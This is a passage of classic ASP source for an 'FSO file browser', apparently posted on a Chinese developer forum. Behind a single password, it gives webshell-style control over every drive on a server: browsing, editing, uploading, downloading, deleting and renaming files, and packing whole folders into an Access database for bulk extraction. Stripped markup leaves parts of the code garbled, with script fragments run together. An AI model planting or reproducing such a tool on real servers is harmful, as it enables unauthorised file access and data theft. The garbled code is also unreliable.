SaveEdit(Request("fname")) Case "delete" Call Deletes(Request("fname")) Case "copy" Call SetFile(Request("fname"),0) Case "cut" Call SetFile(Request("fname"),1) Case "download" Call Download(Request("fname")) Case "upload" Call Upload(Request("fname")) Case "saveupload" Call Saveupload(Request("fname")) Case "parse" Call Parse(Request("fname")) Case "prop" Call Prop(Request("fname")) Case "saveprop" Call SaveProp(Request("fname")) Case "pack" Call Page_Pack() Case "savepack" Call Pack(Request("fpath"),Request("dbpath")) Case "saveunpack" Call UnPack(Request("fpath"),Request("dbpath")) Case Else If Request("fname")="" Then Call Dirlist(Server.MapPath("./")) Else Call Dirlist(Request("fname")) End If End Select End Select End Sub '========== Subs ============= '显示系统磁盘信息 Sub Drive() Dim oDrive,Islight %> FSO文件浏览器 - 系统磁盘信息
FSO文件浏览器 - 系统磁盘信息
<% On Error Resume Next Islight=False For Each oDrive In oFso.Drives Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write ""&vbCrLf Islight=Not(Islight) Next %>
盘符类型卷标文件系统总容量可用空间
"&oDrive.DriveLetter&""&getDriveType(oDrive.DriveType)&""&oDrive.VolumeName&""&oDrive.FileSystem&""&SizeCount(oDrive.TotalSize)&""&SizeCount(oDrive.FreeSpace)&"
<% =Copyright %> <% End Sub '新建 Sub NewF(ByVal Fname) %> FSO文件浏览器 - 新建 <script language="JavaScript"> function icheck() { if(document.rform.nname.value=="") { alert("请输入合法的文件名!"); return false; } else return true; }
FSO文件浏览器 - 新建
类型:文件夹 文件
名称:
 
<% End Sub '保存新建 Sub SaveNew(ByVal Fname) If Not IsFolder(Fname) Then Response.Write "<script language='javascript'>alert('文件夹不存在!');history.back();alert('文件或文件夹已存在!');history.back();alert('新建文件夹或文本文件成功!');window.close();alert('您编辑的不是文件或文件不存在!');window.close(); FSO文件浏览器 - 编辑文本文件
FSO文件浏览器 - 编辑文本文件
文件名: <% =Fname %>
<% End Sub '保存编辑文件 Sub SaveEdit(ByVal Fname) Dim oFile,FileStr Set oFile=oFso.OpenTextFile(Fname,2,True) FileStr=Request.Form("filestr") 'Response.Write FileStr oFile.Write FileStr oFile.Close Set oFile=Nothing EchoBack "保存编辑文件成功!" End Sub '复制或剪切文件 Sub SetFile(ByVal Fname,ByVal iMode) Session(mss & "setfile")=Fname Session(mss & "setmode")=iMode Dim ww If 0=iMode Then ww="复制" Else ww="剪切" End If EchoClose ww&"成功,请粘贴!" End Sub '粘贴文件或文件夹 Sub Parse(ByVal Fname) Dim oFile,oFolder Dim sName,iMode sName=Session(mss & "setfile") iMode=Session(mss & "setmode") If sName="" Then EchoClose "请先复制或剪切!" Else If InStr(LCase(Fname), LCase(sName)) > 0 Then EchoClose "目标文件夹在源文件夹内,非法操作!" Exit Sub End If '================ If Not IsFolder(Fname) Then EchoClose "目标文件夹不存在!" ElseIf IsFile(sName) Then Set oFile=oFso.GetFile(sName) If iMode=0 Then oFso.CopyFile sName,Replace(Fname&"\"&oFile.Name,"\\","\") Else oFso.MoveFile sName,Replace(Fname&"\"&oFile.Name,"\\","\") End If ElseIf IsFolder(sName) Then Set oFolder=oFso.GetFolder(sName) If iMode=0 Then oFso.CopyFolder sName,Replace(Fname&"\"&oFolder.Name,"\\","\") Else oFso.MoveFolder sName,Replace(Fname&"\"&oFolder.Name,"\\","\") End If Else EchoClose "源文件或文件夹不存在!" Exit Sub End If '================ EchoClose "复制或移动成功!刷新可查看效果" End If Session(mss & "setfile")="" Session(mss & "setmode")=0 End Sub '下载文件 Sub Download(ByVal Fname) Dim oFile If Not IsFile(Fname) Then EchoClose "不是文件或文件不存在!" Exit Sub End If Set oFile=oFso.GetFile(Fname) If InStr(LCase(oFile.Path)&"\",LCase(Server.MapPath("/")))>0 And Not IsScriptFile(oFso.GetExtensionName(oFile.Name)) Then Dim FileVName FileVName=Replace(oFile.Path,Server.MapPath("/"),"") FileVName=Replace(FileVName,"\","/") If Left(FileVName,1)<>"/" Then FileVName="/"&FileVName End If Response.Redirect FileVName Exit Sub End If If oFile.Size>1048576*100 Then EchoClose "文件超过100M,可能会造成服务器死机,\n不允许以Stream方式下载!\n请将该文件复制到网站目录以下\n然后以HTTP方式下载" Exit Sub End If Server.ScriptTimeout=10000 '延长脚本超时时间以提供下载 Dim oStream Set oStream=Server.CreateObject("ADODB.Stream") oStream.Open oStream.Type=1 oStream.LoadFromFile(Fname) Dim Data Data=oStream.Read oStream.Close Set oStream=Nothing If Not Response.IsClientConnected Then Set Data=Nothing Exit Sub End If Response.Buffer=True Response.AddHeader "Content-Disposition", "attachment; filename=" & oFile.Name Response.AddHeader "Content-Length", oFile.Size Response.CharSet = "UTF-8" Response.ContentType = "application/octet-stream" Response.BinaryWrite Data Response.Flush End Sub '删除文件 Sub Deletes(ByVal Fname) If IsFile(Fname) Then oFso.DeleteFile Fname,True ElseIf IsFolder(Fname) Then oFso.DeleteFolder Fname,True Else EchoClose "文件或文件夹不存在" Exit Sub End If EchoClose "文件删除成功!" End Sub '上传文件 Sub Upload(ByVal Fname) If Not IsFolder(Fname) Then EchoClose "有指定上传的文件夹!" Exit Sub End If %> FSO文件浏览器 - 文件上传 <script language="JavaScript"> function getSaveName() { var filepath=document.uform.upload.value; if(filepath.length<1) return; var filename=filepath.substring(filepath.lastIndexOf("\\")+1,filepath.length); document.uform.ffname.value=filename; }
FSO文件浏览器 - 文件上传
上传文件:
保存为: 覆盖模式
 
<% End Sub '保存上传文件 Sub Saveupload(ByVal FolderName) If Not IsFolder(FolderName) Then EchoClose "有指定上传的文件夹!" Exit Sub End If Dim Path,IsOverWrite Path=FolderName If Right(Path,1)<>"\" Then Path=Path&"\" FileName=Replace(Request("filename"),"\","") If Len(FileName)<1 Then EchoBack "请选择文件并输入文件名!" Exit Sub End If Path=Path&FileName If LCase(Request("overwrite"))="true" Then IsOverWrite=True Else IsOverWrite=False End If On Error Resume Next Call MyUpload(Path,IsOverWrite) If Err Then EchoBack "文件上传失败!(可能是文件已存在)" Else EchoClose "文件上传成功!\n" & Replace(fileName, "\", "\\") End If End Sub '文件上传核心代码 Sub MyUpload(FilePath,IsOverWrite) Dim oStream,tStream,FileName,sData,sSpace,sInfo,iSpaceEnd,iInfoStart,iInfoEnd,iFileStart,iFileEnd,iFileSize,RequestSize,bCrLf RequestSize=Request.TotalBytes If RequestSize<1 Then Exit Sub Set oStream=Server.CreateObject("ADODB.Stream") Set tStream=Server.CreateObject("ADODB.Stream") With oStream .Type=1 .Mode=3 .Open .Write=Request.BinaryRead(RequestSize) .Position=0 sData=.Read bCrLf=ChrB(13)&ChrB(10) iSpaceEnd=InStrB(sData,bCrLf)-1 sSpace=LeftB(sData,iSpaceEnd) iInfoStart=iSpaceEnd+3 iInfoEnd=InStrB(iInfoStart,sData,bCrLf&bCrLf)-1 iFileStart=iInfoEnd+5 iFileEnd=InStrB(iFileStart,sData,sSpace)-3 sData="" '清空文件数据 iFileSize=iFileEnd-iFileStart+1 tStream.Type=1 tStream.Mode=3 tStream.Open .Position=iFileStart-1 .CopyTo tStream,iFileSize If IsOverWrite Then tStream.SaveToFile FilePath,2 Else tStream.SaveToFile FilePath End If tStream.Close .Close End With Set tStream=Nothing Set oStream=Nothing End Sub '显示文件属性 Sub Prop(Fname) On Error Resume Next Dim obj,oAttrib If IsFile(Fname) Then Set obj=oFso.GetFile(Fname) ElseIf IsFolder(Fname) Then Set obj=oFso.GetFolder(Fname) Else EchoClose "文件或文件夹不存在!" Exit Sub End If Set oAttrib=New FileAttrib_Cls oAttrib.Attrib=obj.Attributes %> FSO文件浏览器 - 文件属性 <script language="javascript"> function ww(obj) { return false; }
FSO文件浏览器 - 文件属性
路径:<% =obj.Path %>
大小:<% =SizeCount(obj.Size) %>
属性: >普通 >只读 >隐藏 >系统
>目录 >存档 >链接 >压缩
创建时间:<% =obj.DateCreated %>
创建时间:<% =obj.DateLastModified %>
最后访问<% =obj.DateLastAccessed %>
 
<% End Sub '修改属性 Sub SaveProp(Fname) Dim Attribs,Attrib Attribs=Replace(Request.Form("att")," ","") Attribs=Split(Attribs,",") Attrib=0 Dim i For i=0 To UBound(Attribs) Attrib=Attrib+Attribs(i) Next 'Response.Write Attrib 'Exit Sub Dim obj,oAttrib If IsFile(Fname) Then Set obj=oFso.GetFile(Fname) ElseIf IsFolder(Fname) Then Set obj=oFso.GetFolder(Fname) Else EchoClose "文件或文件夹不存在!" Exit Sub End If If obj.IsRootFolder Then EchoClose "不能修改根目录属性!" Exit Sub End If obj.Attributes=Attrib EchoBack "修改文件属性成功!" End Sub '转到上一级文件夹 Sub DirUp() Dim oFolder,ssFname If IsFolder(Request("fname")) Then Set oFolder=oFso.GetFolder(Request("fname")) If oFolder.IsRootFolder Then '转至显示驱动器页面 Call Drive() Exit Sub Else ssFname=oFolder.ParentFolder.Path Set oFolder=Nothing Call DirList(ssFname) End If Else If IsFile(Request("fname")) Then '文件下载 Else Response.Write "文件夹或文件不存在!" End If End If End Sub '更改文件名页面 Sub Rename() Dim Fname,sName Fname=Request("fname") If IsFolder(Fname) Then sName=oFso.GetFolder(Fname).Name Else If IsFile(Fname) Then sName=oFso.GetFile(Fname).Name Else Response.Write "文件或文件夹不存在!" Exit Sub End If End If %> FSO文件浏览器 - 重命名 <script language="JavaScript"> function icheck() { if(document.cform.toname.value=="") { alert("请输入合法的文件名!"); return false; } else return true; }
FSO文件浏览器 - 文件更名
更名为:
 
<% End Sub '更改文件名操作 Sub SaveRename() Dim Fname,oFolder,oFile,FDir,ToName Fname=Request("fname") ToName=Replace(Request("toname"),"\","") If IsFolder(Fname) Then Set oFolder=oFso.GetFolder(Fname) Fname=oFolder.Path If Right(Fname,1)="\" Then Fname=Left(Fname,Len(Fname)-1) End If FDir=Left(Fname,InstrRev(Fname,"\")) ToName=FDir & ToName On Error Resume Next Err.Clear Err=False oFso.MoveFolder Fname,ToName If Err Then EchoBack "文件名不合法!" Else EchoClose "文件夹更名成功!\n刷新之后即可看到效果" End If Exit Sub End If If IsFile(Fname) Then Set oFile=oFso.GetFile(Fname) Fname=oFile.Path FDir=Left(Fname,InstrRev(Fname,"\")) ToName=FDir & ToName On Error Resume Next Err.Clear Err=False oFso.MoveFile Fname,ToName If Err Then EchoBack "文件名不合法!" Else EchoClose "文件更名成功!\n刷新之后即可看到效果" End If Exit Sub End If End Sub '文件打包/解包页面 Sub Page_Pack() Dim vp,vu vp=Request("pname") vu=Request("uname") If Right(vu,4)<>".mdb" Then vu=Server.MapPath("/rs_pack.mdb") End If %> FSO文件浏览器 - 文件打包/解包
FSO文件浏览器 - 文件打包/解包
打包文件夹:
打包到:">
文件包路径:
解包到: ">
<% End Sub '文件夹内容列表 ========== Dirlist Sub Dirlist(ByVal Fpath) If IsFile(Fpath) Then '下载该文件 Response.Write "<script language=""javascript"">window.open('?page=fso&act=download&fname="&Server.UrlEncode(Fpath)&"', """", ""menu=no,resizable=yes,height=90,width=400"");history.back(); FSO文件浏览器 <script language="JavaScript"> var folderpath="<% =Replace(oFolder.Path,"\","\\") %>"; //当前文件夹 var fselected=""; function opendial(sUrl) //打开对话框窗口 { var newWin=window.open(sUrl, "", "menu=no,resizable=no,height=130,width=400"); return newWin; } function fopen(sfname) //打开文件夹或文件 { location.href="?page=fso&fname="+escape(sfname); } function fselect(obj) //选文件夹或文件 { var flen=document.all("f").length; for(var i=0;i
FSO文件浏览器
                         
          
<% Dim Islight Islight=False '逐个显示子文件夹 For Each sFolder In oFolder.SubFolders Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write ""&vbCrLf Islight=Not Islight Next '逐个显示文件 For Each sFile In oFolder.Files Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write ""&vbCrLf Islight=Not Islight Next %>
文件名类型大小修改时间
" Response.Write "0 "&Web&sFolder.Name Response.Write "文件夹 "&sFolder.DateLastModified&"
" Response.Write " "&sFile.Name Response.Write ""&sFile.Type&""&SizeCount(sFile.Size)&""&sFile.DateLastModified&"

<% =Copyright %>
<% T2=Timer() Runtime=(T2-T1)*1000 Response.Write "Page Processed in "&Runtime&" Mili-seconds" %>
<% End Sub '用户登录 Sub Login() %> FSO文件浏览器 - 用户登录
FSO文件浏览器 - 用户登录
请输入登录密码:  
<% =Copyright %> <% End Sub '用户登录验证 Sub LoginChk() If Request.Form("password")<>Password Then EchoBack "一夫当关,万夫莫开,您的密码不正确!" Exit Sub Else Session(mss & "IsAdminlogin")=True Response.Redirect "?page=fso" End If End Sub '用户退出 Sub Logout() Session(mss & "IsAdminlogin")=False Response.Redirect "?" End Sub '显示一个图片 Sub Page_Img() Dim HexStr HexStr="47 49 46 38 39 61 01 00 19 00 C4 00 00 6D 92 DA 66 8C D9 7E 9E DF 7B 9C DE 81 A0 DF 79 9A DD 62 89 D8 97 B1 E5 71 94 DB 84 A3 E0 58 81 D5 91 AC E3 5A 84 D6 69 8E DA 65 8B D8 8A A7 E2 76 98 DD 5E 86 D7 61 88 D7 74 97 DC 5D 86 D6 5C 85 D6 6E 92 DB 55 80 D5 6A 8F DA 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 F9 04 00 00 00 00 00 2C 00 00 00 00 01 00 19 00 40 05 15 60 85 09 87 31 3D 51 60 15 C9 72 29 0C 25 39 0D 80 40 03 11 02 00 3B" Response.ContentType="IMAGE/GIF" WriteBytes HexStr End Sub '输出Css Sub Page_Css() %> body { font-family: Verdana, Arial, "宋体"; font-size: 12px; line-height: 1.5em; color: #000000; } input,select,textarea { font-family: Verdana, Arial, "宋体"; font-size: 12px; color: #000000; } a:link { font-size: 12px; color: #000000; text-decoration: none; } a:visited { font-size: 12px; color: #000000; text-decoration: none; } a:active { font-size: 12px; line-height: normal; color: #333333; text-decoration: none; } a:hover { font-size: 12px; color: #FF7F24; text-decoration: underline; } hr { height:1px; color:#6595D6; } table { BORDER-COLLAPSE: collapse; } table.border { border: 1px solid #6595D6; } td { font-family: Verdana, Arial, "宋体"; font-size: 12px; line-height: 1.5em; color: #000000; } td.border { border: 1px solid #6595D6; } td.inner { font-family: Verdana, Arial, "宋体"; font-size: 12px; line-height: 1.5em; color: #000000; border: 0px; } th { font-family: Verdana, Arial, "宋体"; font-size: 12px; line-height: 1.5em; color: #FFFFFF; height:25px; background-color:#427FBB; background-image:url(?page=img); } th.border { border: 1px solid #6595D6; } .b { width:55px; height:22px; font-size:12px; } <% End Sub '================ Functions ================== Function IsFolder(ByVal fname) IsFolder=oFso.FolderExists(fname) End Function Function IsFile(ByVal fname) IsFile=oFso.FileExists(fname) End Function '字节数统计 Bytes Function SizeCount(ByVal iSize) On Error Resume Next Dim size,showsize size=iSize showsize=size & " Byte" if size>1024 then size=(Size/1024) showsize=formatnumber(size,3) & " KB" end if if size>1024 then size=(size/1024) showsize=formatnumber(size,3) & " MB" end if if size>1024 then size=(size/1024) showsize=formatnumber(size,3) & " GB" end if SizeCount = showsize End Function '16进制字符转10进制数字 Function Hex2Num(v) Dim w If IsNumeric(v) Then w=Int(v) Else Select Case UCase(v) Case "A": w=10 Case "B": w=11 Case "C": w=12 Case "D": w=13 Case "E": w=14 Case "F": w=15 Case Else: w=0 End Select End If Hex2Num=w End Function '取得字节字符串的数值 Function Byte2Num(sByte) Dim b1,b2 b1=Left(sByte,1) b2=Right(sByte,1) Byte2Num=Hex2Num(b1)*16+Hex2Num(b2) End Function '将16进制字节字符串输出为二进制数据 Function WriteBytes(sBytes) Dim sByte,i sByte=Split(sBytes," ") For i=0 To UBound(sByte)-1 Response.BinaryWrite ChrB(Byte2Num(sByte(i))) Next End Function '获得文件图标 Function getFileIcon(extName) Select Case LCase(extName) Case "vbs", "h", "c", "cfg", "pas", "bas", "log", "asp", "txt", "php", "ini", "inc", "htm", "html", "xml", "conf", "config", "jsp", "java", "htt", "lst", "aspx", "php3", "php4", "js", "css", "asa" getFileIcon = "Wingdings>2" Case "wav", "mp3", "wma", "ra", "wmv", "ram", "rm", "avi", "mpg" getFileIcon = "Webdings>·" Case "jpg", "bmp", "png", "tiff", "gif", "pcx", "tif" getFileIcon = "'webdings'>Ÿ" Case "exe", "com", "bat", "cmd", "scr", "msi" getFileIcon = "Webdings>1" Case "sys", "dll", "ocx" getFileIcon = "Wingdings>ÿ" Case Else getFileIcon = "'Wingdings 2'>/" End Select End Function '获得磁盘类型 Function getDriveType(num) Select Case num Case 0 getDriveType = "未知" Case 1 getDriveType = "可移动磁盘" Case 2 getDriveType = "本地硬盘" Case 3 getDriveType = "网络磁盘" Case 4 getDriveType = "CD-ROM" Case 5 getDriveType = "RAM 磁盘" End Select End Function '判断是否为脚本文件 Function IsScriptFile(Ext) Const ScriptExts="asp,aspx,asa,php" IsScriptFile=False Dim FileExt,Exts FileExt=LCase(Ext) Exts=Split(ScriptExts,",") Dim i For i=0 To UBound(Exts)-1 If Exts(i)=FileExt Then IsScriptFile=True Exit Function End If Next IsScriptFile=False End Function '返回消息并关闭 Sub EchoClose(msg) Response.Write "<script language=""Javascript"">alert("""&msg&""");window.close();alert("""&msg&""");history.back();=2048 Then c=1 v=v Mod 2048 End If If v>=1024 Then al=1 v=v Mod 64 End If If v>=32 Then a=1 v=v Mod 32 End If If v>=16 Then d=1 v=v Mod 8 End If If v>=4 Then s=1 v=v Mod 4 End If If v>=2 Then h=1 v=v Mod 2 End If If v>=1 Then r=1 End If End Property End Class '============================ 文件打包及解包过程 ============================= '文件打包 Sub Pack(ByVal FPath, ByVal sDbPath) Server.ScriptTimeOut=900 Dim DbPath If Right(sDbPath,4)=".mdb" Then DbPath=sDbPath Else DbPath=sDbPath&".mdb" End If If oFso.FolderExists(DbPath) Then EchoBack "不能创建数据库文件!"&Replace(DbPath,"\","\\") Exit Sub End If If oFso.FileExists(DbPath) Then oFso.DeleteFile DbPath End If If IsFolder(FPath) Then RootPath=GetParentFolder(FPath) If Right(RootPath,1)<>"\" Then RootPath=RootPath&"\" Else EchoBack "请输入文件夹路径!" Exit Sub End If Dim oCatalog,connStr,DataName Set conn=Server.CreateObject("ADODB.Connection") Set oStream=Server.CreateObject("ADODB.Stream") Set oCatalog=Server.CreateObject("ADOX.Catalog") Set rs=Server.CreateObject("ADODB.RecordSet") On Error Resume Next connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & DbPath oCatalog.Create connStr If Err Then EchoBack "不能创建数据库文件!"&Replace(DbPath,"\","\\") Exit Sub End If Set oCatalog=Nothing conn.Open connStr conn.Execute("Create Table Files(ID int IDENTITY(0,1) PRIMARY KEY CLUSTERED, FilePath VarChar, FileData Image)") oStream.Open oStream.Type=1 rs.Open "Files",conn,3,3 DataName=Left(oFso.GetFile(DbPath).Name,InstrRev(oFso.GetFile(DbPath).Name,".")-1) NoPackFiles=Replace(NoPackFiles,"<$datafile>",DataName) FailFileList="" '打包失败的文件列表 PackFolder FPath If FailFilelist="" Then EchoClose "文件夹打包成功!" Else Response.Write "" Response.Write "" Response.Write ""&Replace(FailFilelist,"|","
")&"" End If oStream.Close rs.Close conn.Close End Sub '添加文件夹(递归) Sub PackFolder(FolderPath) If Not IsFolder(FolderPath) Then Exit Sub Dim oFolder,sFile,sFolder Set oFolder=oFso.GetFolder(FolderPath) For Each sFile In oFolder.Files If InStr(NoPackFiles,"|"&sFile.Name&"|")<1 Then PackFile sFile.Path End If Next Set sFile=Nothing For Each sFolder In oFolder.SubFolders PackFolder sFolder.Path Next Set sFolder=Nothing End Sub '添加文件 Sub PackFile(FilePath) Dim RelPath RelPath=Replace(FilePath,RootPath,"") 'Response.Write RelPath & "
" On Error Resume Next Err.Clear Err=False oStream.LoadFromFile FilePath rs.AddNew rs("FilePath")=RelPath rs("FileData")=oStream.Read() rs.Update If Err Then '一个文件打包失败 FailFilelist=FailFilelist&FilePath&"|" End If End Sub '=========================================================================== '文件解包 Sub UnPack(vFolderPath,DbPath) Server.ScriptTimeOut=900 Dim FilePath,FolderPath,sFolderPath FolderPath=vFolderPath FolderPath=Trim(FolderPath) If Mid(FolderPath,2,1)<>":" Then EchoBack "路径格式错误,无法创建改目录!" Exit Sub End If If Right(FolderPath,1)="\" Then FolderPath=Left(FolderPath,Len(FolderPath)-1) Dim connStr Set conn=Server.CreateObject("ADODB.Connection") Set oStream=Server.CreateObject("ADODB.Stream") Set rs=Server.CreateObject("ADODB.RecordSet") connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & DbPath On Error Resume Next Err=False conn.Open connStr If Err Then EchoBack "数据库打开错误!" Exit Sub End If Err=False oStream.Open oStream.Type=1 rs.Open "Files",conn,1,1 FailFilelist="" '清空失败文件列表 Do Until rs.EOF Err.Clear Err=False FilePath=FolderPath&"\"&rs("FilePath") FilePath=Replace(FilePath,"\\","\") sFolderPath=Left(FilePath,InStrRev(FilePath,"\")) If Not oFso.FolderExists(sFolderPath) Then CreateFolder(sFolderPath) End If oStream.SetEos() oStream.Write rs("FileData") oStream.SaveToFile FilePath,2 If Err Then '添加失败文件项目 FailFilelist=FailFilelist&rs("FilePath").Value&"|" End If rs.MoveNext Loop rs.Close Set rs=Nothing conn.Close Set conn=Nothing Set oStream=Nothing If FailFilelist="" Then EchoClose "文件解包成功!" Else Response.Write "" Response.Write "" Response.Write ""&Replace(FailFilelist,"|","
")&"" End If End Sub '=========================================================================== '=========================================================================== '建立文件夹(递归) Function CreateFolder(FolderPath) On Error Resume Next Err=False Dim sParFolder sParFolder=GetParentFolder(FolderPath) If Not oFso.FolderExists(sParFolder) Then CreateFolder(sParFolder) End If oFso.CreateFolder(FolderPath) If Err Then CreateFolder=False Else CreateFolder=True End If End Function Function GetParentFolder(Path) Dim sPath sPath=Path If Right(sPath,1)="\" Then sPath=Left(sPath,Len(sPath)-1) sPath=Left(sPath,InstrRev(sPath,"\")-1) GetParentFolder=sPath End Function '============================================================================ Sub wv(v) If v>0 Then Response.Write " checked " End Sub %>

110,499

社区成员

发帖
与我相关
我的任务
社区描述
.NET技术 C#
社区管理员
  • C#
  • Web++
  • by_封爱
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告

让您成为最强悍的C#开发者

试试用AI创作助手写篇文章吧